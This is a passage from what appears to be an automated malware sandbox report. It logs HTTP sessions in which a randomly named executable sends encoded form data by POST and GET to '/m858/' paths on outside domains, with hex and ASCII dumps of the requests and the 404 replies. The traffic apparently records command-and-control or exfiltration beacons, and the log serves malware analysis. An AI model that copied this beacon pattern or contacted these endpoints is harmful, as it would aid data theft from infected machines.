20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 13:44:44.006094933 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 13:44:44.006110907 CET1251INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.2.849739162.240.81.18806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:44:46.528450966 CET1760OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 32 71 47 79 69 2b 58 6f 58 69 6f 75 53 41 31 71 76 6c 68 77 62 4b 37 48 72 44 48 50 68 42 4a 6f 61 38 4b 6f 33 54 57 51 6c 38 76 2b 59 2b 64 2f 41 67 37 42 52 67 50 6d 73 6b 6f 6b 65 75 50 58 73 30 70 42 30 67 32 6b 6e 45 36 56 57 71 59 79 58 70 75 4b 68 62 7a 50 6e 5a 77 70 5a 75 4a 74 6d 45 4c 6c 35 37 4e 51 31 4c 66 58 64 6d 66 67 48 4b 71 44 6d 49 66 37 56 76 78 7a 69 57 45 6c 66 76 59 6d 70 77 4f 50 37 45 7a 66 51 41 34 34 35 45 79 31 62 64 71 71 43 33 53 5a 66 71 53 4c 49 65 73 32 71 77 33 7a 69 76 66 48 49 33 57 72 37 51 4e 70 4c 50 66 71 30 43 61 30 33 61 63 55 54 68 69 67 55 61 4c 58 52 69 6b 72 34 69 30 62 6d 75 49 58 33 4e 2f 62 42 63 2b 75 4a 4a 54 58 58 79 36 67 6a 66 64 36 53 47 46 4c 36 72 33 78 78 65 67 53 32 36 33 7a 6e 68 45 64 45 33 2b 5a 43 59 77 35 38 78 45 30 59 6d 63 71 38 67 4d 6c 35 66 6b 76 44 70 66 71 68 35 37 34 74 4d 51 6e 51 4c 31 48 32 49 44 44 67 5a 56 4e 38 6c 44 30 48 52 44 5a 75 72 38 66 6a 37 58 52 65 70 69 47 71 42 31 4d 65 53 66 5a 45 6e 7a 77 4f 63 44 68 74 69 48 53 39 4a 69 63 67 50 32 4f 37 38 73 59 47 59 6f 45 58 35 38 59 67 61 72 59 7a 4f 6c 6a 48 74 48 62 56 33 70 59 4a 35 37 32 62 44 45 4b 66 4e 61 79 58 46 46 6b 78 65 6e 70 77 54 45 50 66 49 4e 64 71 63 50 6b 68 76 62 57 6b 51 55 61 59 77 31 65 39 7a 4f 62 36 33 54 4e 4f 49 6d 36 33 55 2b 6c 6f 46 55 51 59 6c 66 4d 65 58 73 39 4c 72 59 45 57 32 56 49 6d 68 5a 58 63 6b 33 33 49 7a 77 46 4f 53 69 5a 6f 36 30 71 48 63 38 58 64 50 4c 31 55 51 44 31 6c 57 6f 51 2f 43 76 52 56 35 65 4c 39 6b 30 36 4a 52 69 56 74 41 6d 35 35 4d 32 2f 53 65 44 46 71 4b 45 78 76 42 32 75 51 74 6d 6c 78 70 71 4a 64 43 46 56 68 76 48 2b 44 72 4e 67 53 33 76 6c 76 31 72 4c 6f 63 56 77 50 41 50 41 4d 63 7a 36 31 67 64 4d 6b 37 70 31 72 2b 79 77 39 58 73 53 6c 33 74 56 55 6a 71 78 44 49 51 52 77 36 51 7a 4c 41 6d 61 33 55 53 32 48 6c 6f 62 2b 30 6d 4c 62 6c 2f 64 38 36 72 76 55 71 47 65 31 78 38 2f 35 4a 79 6b 58 7a 4d 38 43 52 4c 55 38 66 77 6e 65 54 34 78 42 51 2b 75 47 69 5a 61 35 61 38 55 5a 4a 4a 66 6c 62 50 7a 33 42 46 69 6c 76 6b 54 54 76 45 35 4f 4f 4f 72 46 66 53 47 48 4d 77 53 63 36 33 56 43 66 6b 76 6d 37 56 62 4b 46 48 6e 6f 33 78 6d 75 58 31 62 6d 53 65 44 50 46 31 30 77 38 6c 35 48 61 31 74 42 78 46 73 35 75 73 6b 75 4a 6d 30 76 65 57 2f 44 69 43 51 49 37 4a 48 2f 5a 66 6b 45 42 70 4f 4a 35 54 6c 52 42 4a 64 69 53 41 30 68 7a 46 2b 43 53 39 33 48 6b 6b 77 33 59 61 55 63 4a 4f 78 61 72 4f 4f 55 6f 66 61 78 57 6b 6f 76 78 76 57 6a 52 4d 42 6f 6f 74 75 51 6c 51 56 4c 66 49 6b 47 4e 78 5a 42 51 66 61 4d 78 58 61 7a 6c 65 76 57 35 39 65 58 53 6b 62 42 6a 79 41 37 69 49 37 62 4c 2f 73 77 68 57 51 46 35 45 6a 7a 79 78 5a 4e 44 48 59 57 38 68 33 4e 63 35 65 4c 53 4a 67 6e 63 43 30 6e 36 57 49 66 67 72 56 35 2b 4e 70 49 61 49 69 78 78 39 62 43 70 36 68 73 39 4c 4c 4c 2f 70 34 53 58 48 34 6c 55 44 4f 34 57 6c 42 51 53 6e 71 72 65 7a 36 51 64 47 78 6b 45 31 74 6a 71 56 7a 55 73 45 72 70 7a 4a 38 56 64 31 53 4e 62 47 6f 64 61 65 67 53 73 48 47 33 70 36 39 69 53 69 36 4b 6b 36 4a 30 59 64 66 41 66 46 54 30 67 47 2f 53 35 47 51 39 53 57 7a 4d 57 45 50 4c 6f 4a 33 62 78 45 47 61 76 50 6a 63 65 78 6d 58 77 6d 31 74 68 61 79 31 48 54 6f 44 6b 4f 41 33 49 79 72 64 34 6b 6b 43 66 61 68 2b 37 30 35 35 50 74 70 6d 51 75 36 72 6e 47 6e 7a 48 4c 66 71 63 59 37 33 34 63 6b 61 4d 30 62 73 37 33 32 6a 42 76 69 72 51 4f 6f 38 74 61 47 53 30 6a 65 45 48 75 37 56 62 7a 39 43 32 36 33 57 43 4f 45 45 55 72 44 78 56 39 45 62 65 56 4b 62 53 79 41 53 6b 6b 41 33 41 55 36 4a 73 34 4d 48 4d 6c 38 2b 49 6d 47 4a 71 6b 33 5a 78 48 32 51 47 66 71 48 4f 33 34 61 66 4b 77 57 42 73 47 5a 34 41 74 52 75 35 31 4f 68 54 48 68 37 34 32
                                                                                                                      Data Ascii: nRRpS=2qGyi+XoXiouSA1qvlhwbK7HrDHPhBJoa8Ko3TWQl8v+Y+d/Ag7BRgPmskokeuPXs0pB0g2knE6VWqYyXpuKhbzPnZwpZuJtmELl57NQ1LfXdmfgHKqDmIf7VvxziWElfvYmpwOP7EzfQA445Ey1bdqqC3SZfqSLIes2qw3zivfHI3Wr7QNpLPfq0Ca03acUThigUaLXRikr4i0bmuIX3N/bBc+uJJTXXy6gjfd6SGFL6r3xxegS263znhEdE3+ZCYw58xE0Ymcq8gMl5fkvDpfqh574tMQnQL1H2IDDgZVN8lD0HRDZur8fj7XRepiGqB1MeSfZEnzwOcDhtiHS9JicgP2O78sYGYoEX58YgarYzOljHtHbV3pYJ572bDEKfNayXFFkxenpwTEPfINdqcPkhvbWkQUaYw1e9zOb63TNOIm63U+loFUQYlfMeXs9LrYEW2VImhZXck33IzwFOSiZo60qHc8XdPL1UQD1lWoQ/CvRV5eL9k06JRiVtAm55M2/SeDFqKExvB2uQtmlxpqJdCFVhvH+DrNgS3vlv1rLocVwPAPAMcz61gdMk7p1r+yw9XsSl3tVUjqxDIQRw6QzLAma3US2Hlob+0mLbl/d86rvUqGe1x8/5JykXzM8CRLU8fwneT4xBQ+uGiZa5a8UZJJflbPz3BFilvkTTvE5OOOrFfSGHMwSc63VCfkvm7VbKFHno3xmuX1bmSeDPF10w8l5Ha1tBxFs5uskuJm0veW/DiCQI7JH/ZfkEBpOJ5TlRBJdiSA0hzF+CS93Hkkw3YaUcJOxarOOUofaxWkovxvWjRMBootuQlQVLfIkGNxZBQfaMxXazlevW59eXSkbBjyA7iI7bL/swhWQF5EjzyxZNDHYW8h3Nc5eLSJgncC0n6WIfgrV5+NpIaIixx9bCp6hs9LLL/p4SXH4lUDO4WlBQSnqrez6QdGxkE1tjqVzUsErpzJ8Vd1SNbGodaegSsHG3p69iSi6Kk6J0YdfAfFT0gG/S5GQ9SWzMWEPLoJ3bxEGavPjcexmXwm1thay1HToDkOA3Iyrd4kkCfah+7055PtpmQu6rnGnzHLfqcY734ckaM0bs732jBvirQOo8taGS0jeEHu7Vbz9C263WCOEEUrDxV9EbeVKbSyASkkA3AU6Js4MHMl8+ImGJqk3ZxH2QGfqHO34afKwWBsGZ4AtRu51OhTHh742
                                                                                                                      Dec 7, 2023 13:44:46.724708080 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:46 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 13:44:46.724741936 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 13:44:46.724787951 CET1251INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.2.849740162.240.81.18806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:44:49.247971058 CET449OUTGET /m858/?nRRpS=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsKbvkZ0uY+Z5mQ==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:44:49.444380999 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:49 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 13:44:49.444396019 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 13:44:49.444408894 CET1251INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      33192.168.2.84974168.178.195.71806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:44:54.779516935 CET727OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.blessingstation.org
                                                                                                                      Origin: http://www.blessingstation.org
                                                                                                                      Referer: http://www.blessingstation.org/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 56 59 69 2b 4a 36 63 66 36 31 2f 73 37 33 2b 69 79 30 45 71 49 34 38 48 6e 54 39 4f 2f 2b 6a 65 6c 49 51 75 68 6f 32 73 73 46 4d 73 4a 41 55 34 31 6e 79 6c 62 42 45 6c 72 30 74 30 38 39 5a 31 50 70 31 6a 76 73 68 36 66 34 30 59 72 73 38 37 41 31 4a 75 57 41 73 51 47 72 64 47 6f 32 50 7a 59 50 58 4d 66 2f 5a 4c 6f 72 64 45 67 4c 65 4d 53 64 71 50 72 36 35 61 66 5a 44 45 44 79 66 4f 42 75 2b 66 34 34 42 4b 4b 45 53 52 77 42 6d 2b 64 4a 59 47 57 68 78 6f 66 6c 61 37 54 46 6d 73 35 6e 62 65 58 6b 46 2f 78 51 58 62 43 69 6f 37 52 77 3d 3d
                                                                                                                      Data Ascii: nRRpS=VYi+J6cf61/s73+iy0EqI48HnT9O/+jelIQuho2ssFMsJAU41nylbBElr0t089Z1Pp1jvsh6f40Yrs87A1JuWAsQGrdGo2PzYPXMf/ZLordEgLeMSdqPr65afZDEDyfOBu+f44BKKESRwBm+dJYGWhxofla7TFms5nbeXkF/xQXbCio7Rw==
                                                                                                                      Dec 7, 2023 13:44:55.137350082 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:52 GMT
